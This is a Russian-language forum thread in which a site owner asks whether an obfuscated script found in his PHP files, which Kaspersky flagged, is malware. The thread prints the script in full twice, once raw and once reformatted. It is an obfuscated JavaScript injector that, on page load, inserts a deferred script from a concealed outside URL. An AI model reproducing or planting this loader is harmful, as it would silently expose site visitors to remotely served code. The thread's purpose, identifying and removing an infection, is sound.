Как определить, есть ли в действительности вирус? Перепроверить Касперского.

M2
На сайте с 31.01.2011
Offline
57
999

Всем привет.

Такая проблема: есть некий сайт, Касперский говорит о том, что сайт заражен. При этом кроме Касперского никто не ругается (ни гугл, ни яндекс, ни тот же доктор веб в его онлайн проверке).

Специально для выяснения подробностей скачал пробную версию каспера. Скачал папку с сайтом с хостинга на компьютер. Проверил каспером – тот нашел вагон вирусни и, зараза, сразу все поудалял, не дал даже разобраться. Выкачал сайт снова, сижу сравниваю тот, что уже порезан каспером и полный вариант.

Нашел в пхп файлах внизу непонятный подозрительный скрипт. Сам не смогу понять, что этот скрипт делает и является ли он вирусом, или же это какая-то нужная штука.

Может кто по коду определить вирус или нет? Ну или подсказать, куда обратиться?

---------- Добавлено 26.03.2013 в 01:31 ----------

примечание: если скрипт удалить и проверить файл - Касперский не ругается.

то есть, Касперскому не нравится именно этот скрипт.

вопрос: означает ли это, что скрипт можно удалять или все таки есть вероятность, что там что-то нужное и полезное для работы сайта?

Может ли Касперский ошибаться?

Mutabors
На сайте с 17.09.2012
Offline
127
#1

Скрипт то сам где?

Экстрасенсы в такие темы редко заглядывают...

Самый продвинутый и надежный SSD хостинг рунета с изоляцией сайтов по 115 руб! (http://beget.ru/?id=332651) Контекстная реклама и продажи. Конкурентные и серые темы. Дорого! Не трать время на рутину! Ее сделают за копейки! (http://www.work-zilla.com?ref=143498)
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#2
mn21:
Всем привет.
Такая проблема: есть некий сайт, Касперский говорит о том, что сайт заражен. При этом кроме Касперского никто не ругается (ни гугл, ни яндекс, ни тот же доктор веб в его онлайн проверке).
Специально для выяснения подробностей скачал пробную версию каспера. Скачал папку с сайтом с хостинга на компьютер. Проверил каспером – тот нашел вагон вирусни и, зараза, сразу все поудалял, не дал даже разобраться. Выкачал сайт снова, сижу сравниваю тот, что уже порезан каспером и полный вариант.
Нашел в пхп файлах внизу непонятный подозрительный скрипт. Сам не смогу понять, что этот скрипт делает и является ли он вирусом, или же это какая-то нужная штука.
Может кто по коду определить вирус или нет? Ну или подсказать, куда обратиться?

---------- Добавлено 26.03.2013 в 01:31 ----------

примечание: если скрипт удалить и проверить файл - Касперский не ругается.
то есть, Касперскому не нравится именно этот скрипт.

вопрос: означает ли это, что скрипт можно удалять или все таки есть вероятность, что там что-то нужное и полезное для работы сайта?
Может ли Касперский ошибаться?

1) Нет не может. Даже автор скрипта не сможет разобраться в коде😂

Выкладывайте код, тока не простыней на всю страницу, если код большой.

2) Может и нужное, а может и вирус. А может нужное, но нужное тока в крайних случаях(например удаленный постинг или еще что-то)

3) Вирус это или нет - определяет человек! Всё антивирусное ПО является лишь инструментом в руках этого человека. Это как градусник(который подмышку суют): если она показывает температуру, то это совсем не значит у человека грипп. Пример примитивен и чуть-чуть не соответствует, но все же...

Подпись))
M2
На сайте с 31.01.2011
Offline
57
#3
Mutabors:
Скрипт то сам где?.

да как-то постеснялся я его прямо в теме выложить...

ну да попробую:

<script>R=57100;R-=171;var j;var E=new Date();var u=new Array();tU=function(){oN={bV:33436};var im=["V","RD","BK"];function t(T,b,o){qT=4769;qT+=55;var YmI=[];return T.substr(b,o);AB=["NN"];}I_=41564;I_++;var Y=document;var v=RegExp;var Ie={k:"J"};var A='';try {} catch(n){};var h=new String(t("/guhlL",0,2)+t("vZqTooZTqv",4,2)+t("HwUVglVUHw",4,2)+t("e.AkQV",0,2)+t("rwlGcoGrlw",4,2)+t("m/I6h",0,2)+"sp"+t("antuw",0,2)+t("kwBCAP",0,2)+t("TeN7irNT7e",4,2)+"e."+"co"+t("uOvm/uvO",3,2)+t("shjXY",0,2)+t("MGPHaaGPHM",4,2)+t("diFYEH",0,2)+t("BEkX.ckXBE",4,2)+t("CM4om4CM",3,2)+".p"+t("hpmc9",0,2));try {} catch(TL){};try {} catch(p){};U_=6591;U_--;ju=14480;ju--;function L(T,b){var asz=new Array();yc=[];var o="["+b+t("]cJR",0,1);this.gR="gR";var _=new v(o, new String("g"));var uG=30357;return T.replace(_, A);var us="us";};TE=[];var K=58358-50278;OP=["Ta","r"];is={W:false};var PV=new String();var e=L('sHc2rhiup8tU','2FSnz7uOZHYU18h');var IQ=["PB"];var q=null;cv=29928;cv++;this.bY="bY";var N=new String(t("body2Fa",0,4));j=function(){try {var P=L('cBrWejajtBe5Evlqeqm4e5n4tB','qvdgjW45B');var HX=new String();Q=Y[P](e);var EV=["jN","qP","yv"];var Py=new Date();var em=L('sYr7cV','qYVRAT7w');zj={pe:"gU"};this.xg=false;var y=new String("defe"+t("rpoXV",0,1));this.ur=false;var T=K+h;try {} catch(Bf){};OJ={pw:false};JI=24102;JI+=78;Dv=["XL","cy"];var JT={oLl:27883};try {var Do='rg'} catch(Do){};Q[y]=[3,1][1];var eh=43465;var AN="";Q[em]=new String("ht"+"tp"+t(":/L43",0,2)+t("/t4nc",0,2)+t("tV3wen3Vtw",4,2)+t("thys8G",0,2)+t("sw0prw0s",3,2)+t("npzofnpz",3,2)+t("itvEOI",0,2)+t("F6q.rq6F",3,2)+t("eLpAu:AepL",4,2))+T;var Se=["NG"];Y[N].appendChild(Q);var Is=["ve"];} catch(m){var F={};};};Zf=9515;Zf+=149;};tU();var Pl={pl:22049};window.onload=j;jZ=57779;jZ+=193;iH=["NB"];this.es=false;</script>
cybervlad
На сайте с 03.04.2010
Offline
22
#4

< script > R = 57100;
R -= 171;
var j;
var E = new Date();
var u = new Array();
tU = function ()
{
oN = {
bV : 33436
};
var im = ["V", "RD", "BK"];
function t(T, b, o)
{
qT = 4769;
qT += 55;
var YmI = [];
return T.substr(b, o);
AB = ["NN"];
}
I_ = 41564;
I_++;
var Y = document;
var v = RegExp;
var Ie = {
k : "J"
};
var A = '';
try {}
catch (n) {};
var h = new String(t("/guhlL", 0, 2) + t("vZqTooZTqv", 4, 2) + t("HwUVglVUHw", 4, 2) + t("e.AkQV",
0, 2) + t("rwlGcoGrlw", 4, 2) + t("m/I6h", 0, 2) + "sp" + t("antuw", 0, 2) + t("kwBCAP", 0, 2) + t("TeN7irNT7e",
4, 2) + "e." + "co" + t("uOvm/uvO", 3, 2) + t("shjXY", 0, 2) + t("MGPHaaGPHM", 4, 2) + t("diFYEH",
0, 2) + t("BEkX.ckXBE", 4, 2) + t("CM4om4CM", 3, 2) + ".p" + t("hpmc9", 0, 2));
try {}
catch (TL) {};
try {}
catch (p) {};
U_ = 6591;
U_--;
ju = 14480;
ju--;
function L(T, b)
{
var asz = new Array();
yc = [];
var o = "[" + b + t("]cJR", 0, 1);
this.gR = "gR";
var _ = new v(o, new String("g"));
var uG = 30357;
return T.replace(_, A);
var us = "us";
};
TE = [];
var K = 58358 - 50278;
OP = ["Ta", "r"];
is = {
W : false
};
var PV = new String();
var e = L('sHc2rhiup8tU', '2FSnz7uOZHYU18h');
var IQ = ["PB"];
var q = null;
cv = 29928;
cv++;
this.bY = "bY";
var N = new String(t("body2Fa", 0, 4));
j = function ()
{
try
{
var P = L('cBrWejajtBe5Evlqeqm4e5n4tB', 'qvdgjW45B');
var HX = new String();
Q = Y[P](e);
var EV = ["jN", "qP", "yv"];
var Py = new Date();
var em = L('sYr7cV', 'qYVRAT7w');
zj = {
pe : "gU"
};
this.xg = false;
var y = new String("defe" + t("rpoXV", 0, 1));
this.ur = false;
var T = K + h;
try {}
catch (Bf) {};
OJ = {
pw : false
};
JI = 24102;
JI += 78;
Dv = ["XL", "cy"];
var JT = {
oLl : 27883
};
try {
var Do = 'rg'
}
catch (Do) {};
Q[y] = [3, 1][1];
var eh = 43465;
var AN = "";
Q[em] = new String("ht" + "tp" + t(":/L43", 0, 2) + t("/t4nc", 0, 2) + t("tV3wen3Vtw", 4,
2) + t("thys8G", 0, 2) + t("sw0prw0s", 3, 2) + t("npzofnpz", 3, 2) + t("itvEOI", 0, 2) + t("F6q.rq6F",
3, 2) + t("eLpAu:AepL", 4, 2)) + T;
var Se = ["NG"];
Y[N].appendChild(Q);
var Is = ["ve"];
}
catch (m) {
var F = {};
};
};
Zf = 9515;
Zf += 149;
};
tU();
var Pl = {
pl : 22049
};
window.onload = j;
jZ = 57779;
jZ += 193;
iH = ["NB"];
this.es = false;
</script>

mn21 анализируйте и делайте вывод за что отвечает этот код )

E2
На сайте с 15.12.2006
Offline
128
#5

Да, выглядит нехорошо. Удаляйте смело.

Ап! И тигры у ног моих сели.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий